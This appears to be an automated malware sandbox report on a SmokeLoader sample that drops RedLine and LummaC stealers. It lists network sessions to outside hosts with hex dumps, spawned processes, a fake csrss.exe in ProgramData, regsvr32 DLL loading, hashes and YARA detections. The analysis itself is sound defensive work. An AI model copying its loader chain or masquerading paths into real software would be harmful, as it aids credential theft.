                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                106192.168.2.455683162.43.104.1454435304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:31 UTC175OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: nakacho.com
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:32 UTC345INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:31 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                                                                                                                                                Link: <https://nakacho.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:32 UTC16039INData Raw: 32 30 30 30 0d 0a 3c 21 2d 2d 20 34 30 34 2e 70 68 70 20 2d 2d 3e 0a 20 20 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 20 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 79 65 73 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74
                                                                                                                                                                                                                                                                                                                                Data Ascii: 2000... 404.php --> <!DOCTYPE html> <html lang="ja"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, user-scalable=yes, maximum-scale=1.0, minimum-scale=1.0"> <meta http-equiv="x-ua-compatible" content
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:32 UTC16384INData Raw: 68 61 73 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 67 72 65 65 6e 2d 63 79 61 6e 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 70 61 6c 65 2d 63 79 61 6e 2d 62 6c 75 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63
                                                                                                                                                                                                                                                                                                                                Data Ascii: has-light-green-cyan-background-color{background-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-background-color{background-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-background-c
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:32 UTC11886INData Raw: 20 20 0a 20 20 20 20 3c 21 2d 2d 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 2d 2d 3e 0a 20 20 20 20 0a 0a 0a 09 09 09 3c 21 2d 2d 20 2f 6d 61 69 6e 20 2d 2d 3e 0a 0a 20 20 3c 21 2d 2d 20 2f 23 74 61 62 e3 80 80 e6 a8 aa e3 83 90 e3 83 8a e3 83 bc 20 2d 2d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0d 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 20 69 64 3d 22 73 73 69 64 65 5f 62 61 6e 61 22 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 74 61 62 5f 73 69 64 65 62 61 6e 61 30 31 22 20 63 6c 61 73 73 3d 22 74 61 62 5f 62 61 6e 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6e 61 6b 61 63 68 6f 2e 63 6f 6d 2f 6f 74
                                                                                                                                                                                                                                                                                                                                Data Ascii: ..._____________________________________--> ... /main --> ... /#tab --> <div class="container" id="sside_bana"><div id="tab_sidebana01" class="tab_ban"><a href="https://nakacho.com/ot


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                107192.168.2.45577392.240.253.34435304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:46 UTC123INHTTP/1.1 408 Request Time-out
                                                                                                                                                                                                                                                                                                                                content-length: 110
                                                                                                                                                                                                                                                                                                                                cache-control: no-cache
                                                                                                                                                                                                                                                                                                                                content-type: text/html
                                                                                                                                                                                                                                                                                                                                connection: close
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:46 UTC110INData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 38 20 52 65 71 75 65 73 74 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 64 69 64 6e 27 74 20 73 65 6e 64 20 61 20 63 6f 6d 70 6c 65 74 65 20 72 65 71 75 65 73 74 20 69 6e 20 74 69 6d 65 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><body><h1>408 Request Time-out</h1>Your browser didn't send a complete request in time.</body></html>


                                                                                                                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                                                                                                                Target ID:0
                                                                                                                                                                                                                                                                                                                                Start time:05:01:55
                                                                                                                                                                                                                                                                                                                                Start date:21/12/2023
                                                                                                                                                                                                                                                                                                                                Path:C:\Users\user\Desktop\ZRgv8wdMtR.exe
                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                Commandline:C:\Users\user\Desktop\ZRgv8wdMtR.exe
                                                                                                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                File size:249'344 bytes
                                                                                                                                                                                                                                                                                                                                MD5 hash:82FCA540E2348EAF0F7C70992AC6C98A
                                                                                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1711385659.00000000024C1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1711385659.00000000024C1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                                                                • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1711305069.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000003.1645990983.0000000002490000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1711095054.0000000000969000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1711348411.00000000024A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1711348411.00000000024A0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                                Target ID:1
                                                                                                                                                                                                                                                                                                                                Start time:05:02:01
                                                                                                                                                                                                                                                                                                                                Start date:21/12/2023
                                                                                                                                                                                                                                                                                                                                Path:C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                                                                                                                                                                                                Imagebase:0x7ff72b770000
                                                                                                                                                                                                                                                                                                                                File size:5'141'208 bytes
                                                                                                                                                                                                                                                                                                                                MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                                                                                                Target ID:3
                                                                                                                                                                                                                                                                                                                                Start time:05:02:21
                                                                                                                                                                                                                                                                                                                                Start date:21/12/2023
                                                                                                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Roaming\wesswwi
                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                Commandline:C:\Users\user\AppData\Roaming\wesswwi
                                                                                                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                File size:249'344 bytes
                                                                                                                                                                                                                                                                                                                                MD5 hash:82FCA540E2348EAF0F7C70992AC6C98A
                                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000003.00000002.1951376961.0000000000A11000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000003.00000002.1951376961.0000000000A11000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                                                                • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000003.00000002.1951315061.0000000000900000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000003.00000002.1951330825.0000000000910000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000003.00000002.1951330825.0000000000910000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000003.00000003.1900431911.0000000000910000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000003.00000002.1951442963.0000000000A68000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                                Target ID:6
                                                                                                                                                                                                                                                                                                                                Start time:05:02:30
                                                                                                                                                                                                                                                                                                                                Start date:21/12/2023
                                                                                                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                File size:1'974'784 bytes
                                                                                                                                                                                                                                                                                                                                MD5 hash:59646583129ACF5244D686F15AADB25A
                                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                                                                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000006.00000002.1999543598.00000000026CE000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                                Target ID:7
                                                                                                                                                                                                                                                                                                                                Start time:05:02:30
                                                                                                                                                                                                                                                                                                                                Start date:21/12/2023
                                                                                                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                File size:1'974'784 bytes
                                                                                                                                                                                                                                                                                                                                MD5 hash:59646583129ACF5244D686F15AADB25A
                                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                                Target ID:8
                                                                                                                                                                                                                                                                                                                                Start time:05:02:34
                                                                                                                                                                                                                                                                                                                                Start date:21/12/2023
                                                                                                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                Imagebase:0x7ff6e1b30000
                                                                                                                                                                                                                                                                                                                                File size:8'885'269 bytes
                                                                                                                                                                                                                                                                                                                                MD5 hash:033576B4B54E5CB69EC8491FF6624C9F
                                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                                                                                                Target ID:9
                                                                                                                                                                                                                                                                                                                                Start time:05:02:35
                                                                                                                                                                                                                                                                                                                                Start date:21/12/2023
                                                                                                                                                                                                                                                                                                                                Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                Commandline:regsvr32 /s C:\Users\user\AppData\Local\Temp\A748.dll
                                                                                                                                                                                                                                                                                                                                Imagebase:0x7ff740830000
                                                                                                                                                                                                                                                                                                                                File size:25'088 bytes
                                                                                                                                                                                                                                                                                                                                MD5 hash:B0C2FA35D14A9FAD919E99D9D75E1B9E
                                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                                Target ID:10
                                                                                                                                                                                                                                                                                                                                Start time:05:02:35
                                                                                                                                                                                                                                                                                                                                Start date:21/12/2023
                                                                                                                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                Commandline: /s C:\Users\user\AppData\Local\Temp\A748.dll
                                                                                                                                                                                                                                                                                                                                Imagebase:0xc00000
                                                                                                                                                                                                                                                                                                                                File size:20'992 bytes
                                                                                                                                                                                                                                                                                                                                MD5 hash:878E47C8656E53AE8A8A21E927C6F7E0
                                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                                Target ID:11
                                                                                                                                                                                                                                                                                                                                Start time:05:02:37
                                                                                                                                                                                                                                                                                                                                Start date:21/12/2023
                                                                                                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\B013.exe
                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\B013.exe
                                                                                                                                                                                                                                                                                                                                Imagebase:0xdc0000
                                                                                                                                                                                                                                                                                                                                File size:4'765'600 bytes
                                                                                                                                                                                                                                                                                                                                MD5 hash:62C9E15DD99C7D3B7367DCF220579C54
                                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2315527223.0000000003E44000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000B.00000002.2315527223.0000000003E44000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000B.00000000.2062162666.0000000000DC2000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\B013.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                • Rule: INDICATOR_EXE_Packed_DotNetReactor, Description: Detects executables packed with unregistered version of .NET Reactor, Source: C:\Users\user\AppData\Local\Temp\B013.exe, Author: ditekSHen
                                                                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                                Target ID:12
                                                                                                                                                                                                                                                                                                                                Start time:05:02:38
                                                                                                                                                                                                                                                                                                                                Start date:21/12/2023
                                                                                                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\B43A.exe
                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\B43A.exe
                                                                                                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                File size:600'849 bytes
                                                                                                                                                                                                                                                                                                                                MD5 hash:08DEB048589E4E6D6F16AB66BD1020F8
                                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_LummaCStealer_2, Description: Yara detected LummaC Stealer, Source: 0000000C.00000002.2118288328.000000000040D000.00000004.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_LummaCStealer_2, Description: Yara detected LummaC Stealer, Source: 0000000C.00000002.2119244600.0000000000630000.00000002.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                                Target ID:13
                                                                                                                                                                                                                                                                                                                                Start time:05:02:38
                                                                                                                                                                                                                                                                                                                                Start date:21/12/2023
                                                                                                                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                                Target ID:14
                                                                                                                                                                                                                                                                                                                                Start time:05:02:41
                                                                                                                                                                                                                                                                                                                                Start date:21/12/2023
                                                                                                                                                                                                                                                                                                                                Path:C:\ProgramData\Drivers\csrss.exe
                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                Commandline:"C:\ProgramData\Drivers\csrss.exe"
                                                                                                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                File size:1'974'784 bytes
                                                                                                                                                                                                                                                                                                                                MD5 hash:59646583129ACF5244D686F15AADB25A
                                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                                                                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000E.00000002.2113842934.0000000002C00000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                                Target ID:15
                                                                                                                                                                                                                                                                                                                                Start time:05:02:42
                                                                                                                                                                                                                                                                                                                                Start date:21/12/2023
                                                                                                                                                                                                                                                                                                                                Path:C:\ProgramData\Drivers\csrss.exe
                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                Commandline:"C:\ProgramData\Drivers\csrss.exe"
                                                                                                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                File size:1'974'784 bytes
                                                                                                                                                                                                                                                                                                                                MD5 hash:59646583129ACF5244D686F15AADB25A
                                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                                                                                                Target ID:16
                                                                                                                                                                                                                                                                                                                                Start time:05:02:43
                                                                                                                                                                                                                                                                                                                                Start date:21/12/2023
                                                                                                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                Imagebase:0x7ff6e1b30000
                                                                                                                                                                                                                                                                                                                                File size:8'885'269 bytes
                                                                                                                                                                                                                                                                                                                                MD5 hash:033576B4B54E5CB69EC8491FF6624C9F
                                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                                                                                                Target ID:17
                                                                                                                                                                                                                                                                                                                                Start time:05:02:44
                                                                                                                                                                                                                                                                                                                                Start date:21/12/2023
                                                                                                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\CA06.exe
                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\CA06.exe
                                                                                                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                File size:249'344 bytes
                                                                                                                                                                                                                                                                                                                                MD5 hash:F98FBCB2A906CCA96365F1D00E6EDEB4
                                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000011.00000002.2192095995.0000000000A11000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000011.00000002.2192095995.0000000000A11000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000011.00000002.2190393639.0000000000890000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000011.00000002.2190393639.0000000000890000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000011.00000002.2192940256.0000000000A49000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                                                                • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000011.00000002.2189728450.0000000000880000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000011.00000003.2133195697.0000000000890000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                                Target ID:18
                                                                                                                                                                                                                                                                                                                                Start time:05:02:49
                                                                                                                                                                                                                                                                                                                                Start date:21/12/2023
                                                                                                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\E36B.exe
                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\E36B.exe
                                                                                                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                File size:4'329'368 bytes
                                                                                                                                                                                                                                                                                                                                MD5 hash:2263495C4A9413605BA6D61AFE170F1F
